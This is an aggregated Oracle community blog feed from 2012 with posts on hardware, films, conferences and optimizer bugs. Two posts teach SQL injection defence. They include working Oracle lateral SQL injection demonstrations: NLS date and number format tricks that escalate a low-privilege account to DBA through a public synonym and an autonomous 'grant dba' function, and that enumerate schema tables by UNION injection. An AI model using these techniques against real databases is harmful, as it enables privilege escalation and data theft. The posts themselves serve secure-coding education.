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Captain Support: Not to the rescue…

Submitted by oraclebase on Fri, 2012-02-03 17:24

This morning, the display on one of my computers was a bit odd. I rebooted the machine and when it came up I got no output on the monitor. I plugged my laptop into the monitor and that worked fine, so it looked like the graphics card had died. I popped down to a local PC store and had the choice of remortgaging my house for new graphics card, or buying a cheap and cheerful one. I did the latter. Even so, the new card was much flasher than the old one.

I put the card in the machine and it booted up and I had a display again. Trouble was, GNOME shell had failed to start and I was knocked back into fallback mode, that looks a bit like GNOME2. Sigh. Forgot to check the the card against support for the ever-so-picky GNOME shell.

I now have a choice to make:

  • Ditch it and get a new graphics card… again…
  • Switch to KDE or XFCE… shudder…
  • Stay with the fallback option until Fedora 17, when allegedly GNOME shell will not be so bloody fussy.

I’m probably going to stick with the last option as I can’t be bothered to waste any more time on this. All of a sudden, Windows and Mac OS X don’t seem so bad after all…

Cheers

Tim…

PS. I don’t need a lecture on why GNOME shell is so picky. I know all the arguments. I’ve read all the crap. Doesn’t mean it’s not a pain in the ass when you buy a newer and more powerful graphics card and you end up with an inferior user experience.




Chronicle…

Submitted by oraclebase on Fri, 2012-02-03 16:16

I thought Chronicle was a cool film. Three kids find some weird object and develop super powers. How will it affect them and how will they choose to use them?

It has the “shot on my camcorder” feel, like Cloverfield, and has a kind of Akira feel to me. While I was watching it I kept expecting someone to say, “With great power comes great responsibility!” :)

The effects are pretty cool. At the start they look like they are going to be a bit low budget, but by the end they get pretty impressive.

Nice mix of teen angst, super powers and destruction. Obviously not targeted for 42 year old men, but it hit the mark for me. I guess that says a lot. :)

Cheers

Tim…




All about Security - SQL Injection redux

Submitted by tkyte on Fri, 2012-02-03 13:02

I just wrote about SQL Injection yesterday - after having giving a web seminar on Wednesday the touched on the topic.

One of the comments on that post was by David Litchfield, he wrote:

#333333; font-family: 'Trebuchet MS', Verdana, Arial, sans-serif; line-height: 18px; text-align: left;">Hey Tom,#333333; font-family: 'Trebuchet MS', Verdana, Arial, sans-serif; line-height: 18px; text-align: left;">Funnily enough I just published a paper about doing the same thing with NUMBER concatenations. This was an addendum to a paper I wrote in 2008 on exploit DATE concatenations - the same problem you discuss here. You can get the recent paper here: http://www.accuvant.com/capability/accuvant-labs/security-research/lateral-sql-injection-revisited-exploiting-numbers and the first paper here: http://www.databasesecurity.com/dbsec/lateral-sql-injection.pdf

#333333; font-family: 'Trebuchet MS', Verdana, Arial, sans-serif; font-size: x-small;">

I read that new paper and learned something new (actually, much like David - I was kicking myself because I should have been able to see this problem coming as well.  It is just a variation on a theme after all).  In that paper, he demonstrates how to exploit a SQL Injection flaw using NLS settings with numbers.  That is something I hadn't considered before.  NLS settings for numbers are different than for dates.  With a date, I can set the format string to have any string of characters I want.  With numbers - you are very much restricted. On the face of it - it doesn't look like you can exploit a SQL Injection flaw with numbers like you can with dates.

But - you can.  Just not as flexibly.  But the end result can be as disastrous.

One of the follow on comments to this posting by David was:

#333333; font-family: 'Trebuchet MS', Verdana, Arial, sans-serif; line-height: 18px; text-align: left;">the problem David mentions in #333333; font-family: 'Trebuchet MS', Verdana, Arial, sans-serif; line-height: 18px; text-align: left;">http://www.accuvant.com/capability/accuvant-labs/security-research/lateral-sql-injection-revisited-exploiting-numbers #333333; font-family: 'Trebuchet MS', Verdana, Arial, sans-serif; line-height: 18px; text-align: left;">only arises since NUM_PROC is owned by SYS,#333333; font-family: 'Trebuchet MS', Verdana, Arial, sans-serif; line-height: 18px; text-align: left;">as far as I can see, correct ? 

#333333; font-family: 'Trebuchet MS', Verdana, Arial, sans-serif; line-height: 18px; text-align: left;">So, it's not really a problem since nobody ever does something as SYS, correct.

In his example, David used SYS to demonstrate with - which could lead people to believe "ah, it needs SYS to exploit this flaw".  But - it doesn't.  All it requires is an account with these privileges:

  • Create session
  • Create procedure
  • Create public synonym <<<=== these guys are evil!  Should be avoided
And another schema that has the ability to GRANT stuff - like DBA.  It doesn't have to be DBA, it could be any privilege they have the ability to grant.
Here is how to exploit the flaw.  First - read David's paper to get the background on the 'P ' NLS_NUMERIC_CHARACTERS.  Then you'll understand how:
a%ORA11GR2> select .1 from dual;

        .1
----------
        P1
works.  Once you have mastered that, all we need to do to exploit this type of SQL Injection flaw is this.  I'll have a DBA schema containing a procedure that uses dynamic SQL with string concatenation and a number as an input:
ops$tkyte%ORA11GR2> create or replace procedure do_something( l_num in number )
  2  as
  3      l_query  long;
  4      l_cursor sys_refcursor;
  5      l_rec    all_users%rowtype;
  6  begin
  7      l_query := '
  8       select *
  9         from all_users
 10        where user_id = ' || l_num;
 11      dbms_output.put_line( l_query );
 12  
 13      open l_cursor for l_query;
 14  
 15      loop
 16          fetch l_cursor into l_rec;
 17          exit when l_cursor%notfound;
 18          dbms_output.put_line( 'username = ' || 
                                   l_rec.username );
 19      end loop;
 20      close l_cursor;
 21  end;
 22  /
Procedure created.
Then, we'll have our account with the small set of privileges:
ops$tkyte%ORA11GR2> create user a identified by a;
User created.

ops$tkyte%ORA11GR2> grant create session, create procedure,
                    create public synonym to a;
Grant succeeded.
and we'll allow it to access this procedure - just like in my original SQL Injection article:
ops$tkyte%ORA11GR2> grant execute on do_something to a;
Grant succeeded.
Ok, so now we'll log in as A and run the procedure to see what it does:
ops$tkyte%ORA11GR2> connect a/a
Connected.
a%ORA11GR2> 
a%ORA11GR2> exec ops$tkyte.do_something( 5 );

     select *
       from all_users
      where user_id = 5
username = SYSTEM

PL/SQL procedure successfully completed.
Now, we suspect it might use string concatenation - so we'll create a function that might be able to exploit this:
a%ORA11GR2> create or replace function foobar return number
  2  authid current_user
  3  as
  4      pragma autonomous_transaction;
  5  begin
  6      execute immediate 'grant dba to a';
  7      return 5;
  8  end;
  9  /
Function created.
And then set up our public synonym for it and allow others to execute it:
a%ORA11GR2> create public synonym p1 for foobar;
Synonym created.

a%ORA11GR2> grant execute on foobar to public;
Grant succeeded.
and now for the magic:
a%ORA11GR2> alter session set nls_numeric_characters = 'P ';
Session altered.
and viola:
a%ORA11GR2> set role dba;
set role dba
*
ERROR at line 1:
ORA-01924: role 'DBA' not granted or does not exist


a%ORA11GR2> exec ops$tkyte.do_something( .1 );

     select *
       from all_users
      where user_id = P1
username = SYSTEM

PL/SQL procedure successfully completed.

a%ORA11GR2> set role dba;

Role set.
I have DBA...
SQL Injection is insidious.  SQL Injection is hard to detect.  SQL Injection can be avoided - by simply using bind variables.  In the event a bind variable is not possible for some provable technical reason (and those events are few and far far far in between) you have to critically review that code over and over and try to think of every way it could be exploited.  The problem with that however is that before yesterday - I would have looked at this code and might have said "this looks ok".  
It is really hard to protect yourself from something you cannot see.



Updated a little later: Let me also say this:

If you use static sql in plsql - your code in plsql cannot be sql injected, period.  It is not possible.  The only way to get sql injected in plsql is to use dynamic sql - that is the only time.  So, if you want maximum protection from SQL Injection - if you just want to avoid it, you will:

a) write your SQL code in PL/SQL
b) call this PL/SQL from your java/c/c#/whatever code USING BINDS to pass all inputs and outputs to/from the database

If you do that - no SQL Injection attacks are possible.  

RMOUG

Submitted by Jonathan Lewis on Fri, 2012-02-03 09:40

Just a quick reminder that the Rocky Mountain Oracle User Group Training days are just eleven days away. It’s one of the best Oracle events I’ve attended, and I’ll be there again this year. There are plenty of good speakers and interesting presentations on a wide range of topics – and if you’re wandering around between sessions with nothing to do, I’ll be around too and will be happy to say hello and have a chat.

Here’s the list of things I’ve pencilled in on my timetable so far. (Some of the gaps are there because I’m doing three presentations myself, some are there because I haven’t decided what to see yet.)

Wednesday 9:15 Database I/O Performance: Measuring and Planning – Alex Gorbachev, Pythian
10:45 Parallel Execution in RAC – Riyaj Shamsudeen, OraInternals
16:00 Making Sense of Big Data – Gwen Shapira, Pythian
Thursday 8:30 Developing and Deploying Extremely Large Databases with Oracle 11gR2 – Daniel Morgan, Morgan’s Library
9:45 Mining the AWR Repository for Capacity Planning, Visualization, and other Real World Stuff – Karl Arao, Enkitec
13:30 Using Oracle Execution Plans for Performance Gains – Janis Griffin, Confio Software

If nothing else catches your eye, don’t miss out the opportunity to hear Maria Colgan talking about the optimizer. She’s doing three presenations (and only one of them coincides with one of mine) and they’re all worth hearing.

Big Data...

Submitted by tkyte on Thu, 2012-02-02 20:01

I'll be doing a web seminar on Big Data on February 16th at 10am Pacific Time.  Here is the info:

Big Data Essentials: What You Need to Know, February 16th, 10:00 am – 1:30 pm PT

Big data is big news these days. But you don’t base IT investment decisions on magazine headlines.

Join us for the Big Data Online Forum to learn the essentials of big data—from the technology underlying it to real-world use cases. Oracle’s Tom Kyte, Cloudera CEO Mike Olson, and other industry thought leaders will be on hand to explain how big data can deliver revolutionary insight and competitive advantage.

You’ll get answers to tough questions surrounding big data, including:

  •     What business insight can big data uncover?
  •     How do you manage big data?
  •     How do you integrate big data into decision-making?

Register today for this half-day online event featuring live Q&A with big data experts.

www.oracle.com/goto/bigdata

All about Security - SQL Injection

Submitted by tkyte on Thu, 2012-02-02 19:48

I recently did a web seminar on Oracle Database Security (you can see a replay of it here).  We had over 1,300 live attendees (glad I couldn't see you all - that would be scary) and the feedback was pretty good.

We also received a few questions, well, actually - a lot of questions.  I'm going to try to tackle them here bit by bit.  I'm going to start with my favorite topic - questions centered around SQL Injection.  I'll center on the core concepts around SQL Injection in this article and then do a followup article regarding the Oracle Database Firewall - a tool useful for detecting and blocking SQL Injection attacks.

During the presentation - I talked about how insidious SQL Injection is - and how hard it can be to detect. In fact, I've written about this before, in this article.  The interesting thing about that article on injecting is the very last part of it, the section on "selective system grants".  If you read that small section you'll see a comment "Note: Revised content—to prevent SQL injection— for this procedure submitted by Roy Jorgensen.".  What that means is - the original article I submitted had a SQL Injection bug in it - right after I just spent pages going over SQL Injection!  That wasn't too embarrassing was it (it was).  But it does point out how easy it is for a SQL Injection bug to sneak into code - even when the coder knows full well what SQL Injection is and how it happens!

Anyway, during the web seminar I talked about a slide I use - with a full stored procedure on it - that contains a SQL Injection bug.  I ask the audience, usually full of developers and DBAs to tell me how the code can be SQL Injected..  I tell them right out - this code can be injected and if I were to put it in my schema and grant you execute on it - you could use this to read pretty much any table I own.

I usually hear crickets at this point in time, no hands, no volunteers.  Here is the slide:

Note that the input to this procedure is a binary Oracle date - it is fixed length, 7 bytes of data - the century, year, month, day, hour, minute and second.   The input is not a string, the input cannot contain things like "or 1=1" - typical SQL Injection attack strings.  It can only contain an Oracle date.  So - the question is - how can I 'trick' this stored procedure into showing me anything I want to see in the schema that owns the procedure (thus bypassing any and all security the application tier might have put in place - there are no restrictions on what I can and cannot see now).

Before we get there - let's talk about the bit of code that will be problematic - that is line 10.  As noted there is a double implicit conversion going on there.  That line of code is really:

Where created = to_date( to_char( p_date ) );

There is an implicit to_char on the date field in order to concatenate it to the query string.  Then, at runtime there is an implicit to_date on the string we concatenated in so we can compare it to a date.  This is a very common thing I see in code all of the time (implicit conversions) - but it is pure evil.  Not only will we discover it is the cause of a SQL Injection issue - but here it is a logic bomb as well.
First of all - by default - that to_date( to_char() ) conversion will have a side effect of effectively truncating the time component from the date field.  That is evil.  If you wanted to truncate the time off - please use TRUNC() on the date - it is much faster, more efficient, and expresses clearly that you intend to truncate the time component.  To_date(to_char()) does none of that.  Secondly - the conversion by default will also lose the century.  If you were trying to look for things created during the war of 1812 - you would lose, you cannot search for 1812 - it would become 2012 (well, right now as I write this it would be 2012 - in 38 years it will become 2112 and you won't be able to search for 2012 anymore...).

Also consider that I said "by default".  By default the NLS_DATE_FORMAT is DD-MON-RR (currrently, it has been different in the past!).  What happens to this code when someone decides to change it?  Your application might well start querying up entirely different data!

So, the implicit conversion by itself is bad - but the real issue is the SQL Injection flaw.  If you just run this procedure, by default - it certainly looks OK:
ops$tkyte%ORA11GR2> exec inj( sysdate )

        select *
          from all_users
         where created = '02-FEB-12'

PL/SQL procedure successfully completed.
that looks OK - seems pretty safe - until, until someone who has read the documentation comes along.  They might run your code like this:
ops$tkyte%ORA11GR2> alter session set
  2  nls_date_format = 'dd-mon-yyyy"'' or ''a'' = ''a"';

Session altered.
ops$tkyte%ORA11GR2> exec inj( sysdate )

        select *
          from all_users
         where created = '02-feb-2012' or 'a' = 'a'
A.....
EBRAPP.....
EBRTBLS.....
UTIL.....
USER2.....

PL/SQL procedure successfully completed.
Now that is surprising,  you might not even know you could do that in an NLS_DATE_FORMAT.  It is really hard to protect against something you don't even know you can do - isn't it?  I've had people look at that example and scoff at it - saying "so what, they were allowed to see that table".  Ok, take it a step further, I'd like to know what tables you own - so I can start querying them.  I'll just do this:
ops$tkyte%ORA11GR2> alter session set
  2  nls_date_format = '"''union select tname,0,null from tab--"';
Session altered.

ops$tkyte%ORA11GR2> exec inj( null )

Select *
  from all_users
 where created = ''union select tname,0,null from tab--'

....
Now you can see where this is going...  I find one SQL Injection bug in one procedure and I've unlocked the entire schema.  
So, the question now comes up - how do I protect myself from this?  What can I do to ensure I'm not subject to SQL Injection in this code?
There are two ways - the hard way and the easy way.  
The hard way involves writing code to validate everything and having serious code reviews of any code that uses string concatenation to build their SQL statements - any code that takes a parameter as input and concatenates it to a SQL query must be read and reviewed by many people - many people who will be super critical of the code.  In this case, the resulting code would have to be:
where created = to_date( ''' || to_char(p_date,'yyyymmddhh24miss') ||''', ''yyyymmddhh24miss'')';   
You need to have a coding standard that says:
  1. You shall never use implicit conversions ever, as in never.
  2. You shall always use an explicit date mask with dates, as in every single time, you will not rely on defaults (because defaults can inject you and because defaults can radically modify your logic unintentionally!)
And now you have to comb through all of your code looking for these bad practices (you should anyway - you have major logic bombs just waiting to explode in your code if you rely on default NLS settings and implicit conversions).
The easy way however is the way to go.  The easy way is - just use bind variables!  If you use bind variables, you cannot be SQL Injected - this is true for PL/SQL, for Java, for any and all languages.  If you use bind variables you cannot be SQL Injected - period.  It is that simple, really and truly.  If the code was:
  7          l_query := '
  8          select *
  9            from all_users
 10           where created = :x';
 11          open c for l_query USING P_DATE;
there is no way the end user can trick that SQL query into becoming anything other than what it is - in fact, for this example, the code should have been:
as
   cursor c is select * from all_users where created = p_date;
begin
   open c;
   ...
and nothing more - it shouldn't have even been using dynamic SQL.  In Java/C#/C++/etc - you would be using dynamic SQL and you should be using bind variables.   So, that answered all of these questions I received:
where can I find an illustration of SQL injection?
can u share the sql injection demo code
Can you share that SQL injection slide?
Can you show a code example of the SQL injection bug that nobody noticed during your presentations?
Can you show us or point us to the site of the example of SQL injection bug?
Is SQL injection all about binding, or is there more?
Another question was:
should application layer deal with the SQL injection attacks prevention as that layer understands what the proper data access patterns look like rather then database?
My response to that is - the application layer should definitely be aware of SQL Injection and use secure coding practices which would include:

always use a bind variable unless you have an excellent technical reason not to - and then you must submit your code for review to at least five people who do not like you - they must be motivated to rip your code apart, critically review it, make fun of it - so they find the bugs.

However - we need to also employ defense in depth - for when the inevitable bug slips through.  When I next write about this - I'll be going over the Oracle Database Firewall - a tool that can provide at least one more layer of defense.
The last question on this topic was: 
What is the dbms_assert PL/SQL package? How does it help prevent SQL injection? Should my organization be using it?
For that - I'll just forward you onto an excellent paper on this subject written by Bryn Llewellyn.  You can find that paper here.

Viewing Figures

Submitted by Jonathan Lewis on Thu, 2012-02-02 15:45

It’s time for another landmark. The blog has just hit 2,500,000 views (taking three weeks less than the previous half million increment) – here’s a little breakdown on the numbers.

First the top five across the lifetime of the blog:

AWR / Statspack menu 40,714 Updated from time to time
NOT IN 33,983 Feb 2007
Cartesian Merge Join 29,633 Dec 2006
dbms_xplan in 10g 28,831 Dec 2006
SQL Profiles (10g) 21,227 Feb 2007

If we look at just the last year, the top five are:

AWR / Statspack menu 18,782 Updated from time to time
NOT IN 8,916 Feb 2007
dbms_xplan in 10g 6,212 Dec 2006
Oracle Core 6,181 Dec 2011
Analysing Statspack (1) 5,924 Nov 2006

The Cartesian Merge Join has finally been pushed off the top 5 in recent history, but perhaps that’s only a temporary effect while the Addenda to Oracle Core is still fresh in people’s minds. It’s interesting to see how many old articles are still popular reading, though.

The other statistic of note is the number of followers the blog has, currently: 828

While we’re looking at numbers and success stories for the 12 months – the UKOUG annual conference reviews have just come in, and one of mine managed to score 5.83 out of 6 for “Presentation Skills” and 5.65 for content – with one commentator saying:

“Jonathan Lewis is a legend in Oracle circles and now, after my first session with him as speaker, I know why! This was a really well-thought out talk with loads of great ideas and info. My only criticism is that I’d like to attend it again to pick up the bits I missed the first time!”

Don’t worry – it was the one about “Beating the Oracle Optimizer”, 60 minutes featuring seven different strategies for optimising a two-table join, and I’ll be presenting it at least a couple more times in the UK (probably 27th March and 13th June in Manchester and Linlithgow).

I also won two the of UKOUG’s “Inspiring Presenter” awards this year. Not sure I’ll be able to do that again next year since Connor McDonald was in town this year – if you ever get a chance to hear him, make sure you don’t miss it.

 

 

Google Connect is dead, long live the Google+ badge…

Submitted by oraclebase on Thu, 2012-02-02 10:56

The Google Friend Connect badge I’ve been displaying on my website homepage and this blog is no more. Google have canned that widget.  Instead it’s been replaced by a Google+ badge. Unfortunately, the G+ badges currently only support Google+ pages, so I can’t connect it to my regular G+ profile, only the ORACLE-BASE.com G+ page. Not ideal, but that’s the way it goes. :)

Currently, the G+ badge options are not particularly WordPress widget friendly. Even the small option is a bit wider than the width of the sidebar on my blog theme.

I’m not planning on double-posting, so feel free to connect to both profiles if you like. You won’t get everything twice. For the time being, my regular G+ profile is what I’ll be using and the ORACLE-BASE.com G+ page is really only present to support the badge for those people who like to show the site some love. :)

Cheers

Tim…




Subquery Factoring

Submitted by Jonathan Lewis on Wed, 2012-02-01 17:52

It’s always worth browsing through the list of Oracle’s bug fixes each time a new release or patch comes out because it can give you clues about where to look for problems in your production release – and how to anticipate problems on the upgrade. This article is an example of a fix that I found while while looking at the note for 11.2.0.3 quite recently.

Over the last thre or four years I’ve made several commentsabout how subquery factoring could result in changes in execution plans even if the “factored subquery” (or “common table expression” to use the more appropriate technical term) was moved in line. In the 11.2.0.3 bug fixes list, though, you’ll find the following bug fixes:

Bug 11740670 Different execution plans with and without subquery factoring (WITH clause)
Bug 9002661 Transitive predicate were not generated in WITH clause.

So here’s an example that’s been sitting on my laptop for a few years, waiting for the right bug fix (it’s using my standard setup of 8KB block size, LMT with 1MB uniform extents, but not ASSM, and CPU costing disabled):

create table emp (
	dept_no		not null,
	sal,
	emp_no,
	padding,
	constraint e_pk primary key(emp_no)
)
as
select
	mod(rownum,6),
	rownum,
	rownum,
	rpad('x',60)
from
	all_objects
where
	rownum <= 20000
;

-- collect stats, compute, no histograms

select
	outer.*
from
	emp outer
where
	sal > 1000000
and	outer.sal > (
		select
			avg(inner.sal)
 		from	emp inner
		where	inner.dept_no = outer.dept_no
	)
;

with subq as (
	select
		outer.*
	from
		emp outer
	where
		sal > 1000000
	and	outer.sal > (
			select
				avg(inner.sal)
 			from	emp inner
			where	inner.dept_no = outer.dept_no
		)
	)
select	*
from	subq
;

In 11.1.0.7 (and earlier) the first version of this query uses a simple filter subquery, and the second version inlines the factored subquery (which should, therefore, produce the same plan) but then unnests the subquery and uses “group by placement” to resolve the plan as a hash join followed by hash aggregation. This gives us two completely different plans:


Plan for first form of the query
------------------------------------------------------------
| Id  | Operation           | Name | Rows  | Bytes | Cost  |
------------------------------------------------------------
|   0 | SELECT STATEMENT    |      |     1 |    72 |    70 |
|*  1 |  FILTER             |      |       |       |       |
|*  2 |   TABLE ACCESS FULL | EMP  |     1 |    72 |    35 |
|   3 |   SORT AGGREGATE    |      |     1 |     8 |       |
|*  4 |    TABLE ACCESS FULL| EMP  |  3333 | 26664 |    35 |
------------------------------------------------------------

Predicate Information (identified by operation id):
---------------------------------------------------
   1 - filter("OUTER"."SAL"> (SELECT AVG("INNER"."SAL") FROM "EMP"
              "INNER" WHERE "INNER"."DEPT_NO"=:B1))
   2 - filter("SAL">1000000)
   4 - filter("INNER"."DEPT_NO"=:B1)

Plan with factored subquery moved in line
-------------------------------------------------------------
| Id  | Operation            | Name | Rows  | Bytes | Cost  |
-------------------------------------------------------------
|   0 | SELECT STATEMENT     |      |     1 |    83 |    93 |
|*  1 |  FILTER              |      |       |       |       |
|   2 |   HASH GROUP BY      |      |     1 |    83 |    93 |
|*  3 |    HASH JOIN         |      |  1667 |   135K|    71 |
|*  4 |     TABLE ACCESS FULL| EMP  |     1 |    72 |    35 |
|   5 |     TABLE ACCESS FULL| EMP  | 20000 |   214K|    35 |
-------------------------------------------------------------

Predicate Information (identified by operation id):
---------------------------------------------------
   1 - filter("OUTER"."SAL">AVG("INNER"."SAL"))
   3 - access("INNER"."DEPT_NO"="OUTER"."DEPT_NO")
   4 - filter("SAL">1000000)

Under 11.2.0.3, however, the first plan appears for both forms of the query.

On the plus side – this is good, because Oracle is now behaving consistently. On the minus side – this is bad, because someone, somewhere, is going to be the unlucky person who managed to get a good execution plan by accident because of the bugs.

Maxim: when upgrading to 11.2.0.3, keep a close eye on any queries you’ve got that include subquery factoring – in fact, you might decide to capture SQL Baselines (without activating them) for every single one of them before doing the upgrade so that you can enforce the pre-upgrade plan if the post-upgrade plan is less efficient.

Footnote: I haven’t finished with this example – there’s an interesting follow-up that appeared in the remainder of my test code when I hinted the subquery into materialization. But that’s a story for another day.

Understanding Storage Masterclass – Dates Available

Submitted by James Morle on Wed, 2012-02-01 07:52

We’ve just booked the first European venue for the Understanding Storage Masterclass. I will be presenting the Masterclass on April 24/25 2012 at Prospero House in London, tickets are available HERE. I’m pretty excited to host this training session in my home country, and I hope to see you there!